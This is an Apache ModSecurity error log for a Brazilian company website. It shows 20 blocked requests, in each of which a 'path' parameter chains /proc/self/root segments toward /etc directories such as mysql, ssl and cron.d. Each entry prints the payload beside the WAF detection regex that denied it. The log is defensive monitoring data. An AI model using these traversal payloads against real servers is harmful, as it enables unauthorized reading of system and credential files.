[Tue Mar 17 09:12:16.527327 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.241.46:51744] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFIKBJNF7axNlVR0X6QwAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:17.747070 2026] [:error] [pid 1961:tid 140411540502272] [client 74.7.241.46:51758] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFIXRXaaWotPICgYsitgAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:18.407489 2026] [:error] [pid 7437:tid 140411666392832] [client 74.7.243.203:50044] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFIgeiSKl8TjouI-b_0QAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:12:21.414954 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.241.46:50484] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFJZqmL8PQht4WJFlFHgAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:22.168656 2026] [:error] [pid 11469:tid 140411582465792] [client 74.7.243.203:50060] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFJpDEJR9VXonE_-1MAgAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:12:26.569956 2026] [:error] [pid 7000:tid 140411649607424] [client 74.7.241.46:50500] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFKhePVOt35XCGZP8tNgAAA4s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:27.842957 2026] [:error] [pid 7000:tid 140411733534464] [client 74.7.241.46:50502] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFKxePVOt35XCGZP8tOgAAA4E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:29.087190 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.241.46:45030] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFLQeiSKl8TjouI-b_3AAAA8Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:30.464293 2026] [:error] [pid 2325:tid 140411574073088] [client 74.7.241.46:45042] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFLu82sZHvlq4xgHrAOgAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:31.679519 2026] [:error] [pid 2325:tid 140411557287680] [client 74.7.241.46:45044] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFL-82sZHvlq4xgHrAPAAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:33.093674 2026] [:error] [pid 11293:tid 140411582465792] [client 74.7.241.46:45060] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFMdCmCSWTlPouqorIcgAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:36.388507 2026] [:error] [pid 7000:tid 140411582465792] [client 74.7.241.46:45068] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFNBePVOt35XCGZP8tQwAAA5M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:37.811390 2026] [:error] [pid 2325:tid 140411716749056] [client 74.7.241.46:45078] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFNe82sZHvlq4xgHrAPgAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:40.288140 2026] [:error] [pid 2325:tid 140411624429312] [client 74.7.241.46:37504] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFOO82sZHvlq4xgHrARQAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:46.354753 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.241.46:37518] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFPqBJNF7axNlVR0X6VQAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:49.753636 2026] [:error] [pid 11469:tid 140411641214720] [client 74.7.241.46:37522] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFQZDEJR9VXonE_-1MMgAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:12:54.183321 2026] [:error] [pid 2305:tid 140411599251200] [client 74.7.241.46:37878] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFRgQohV2v-7oj5HH4WQAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:13:01.624215 2026] [:error] [pid 11469:tid 140411624429312] [client 74.7.241.46:37880] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFTZDEJR9VXonE_-1MSQAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:13:04.083431 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.241.46:60328] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFUKBJNF7axNlVR0X6XAAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:13:06.514535 2026] [:error] [pid 2325:tid 140411658000128] [client 74.7.241.46:60336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFUu82sZHvlq4xgHrATAAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:13:12.891114 2026] [:error] [pid 11293:tid 140411599251200] [client 74.7.241.46:60348] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFWNCmCSWTlPouqorIgAAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
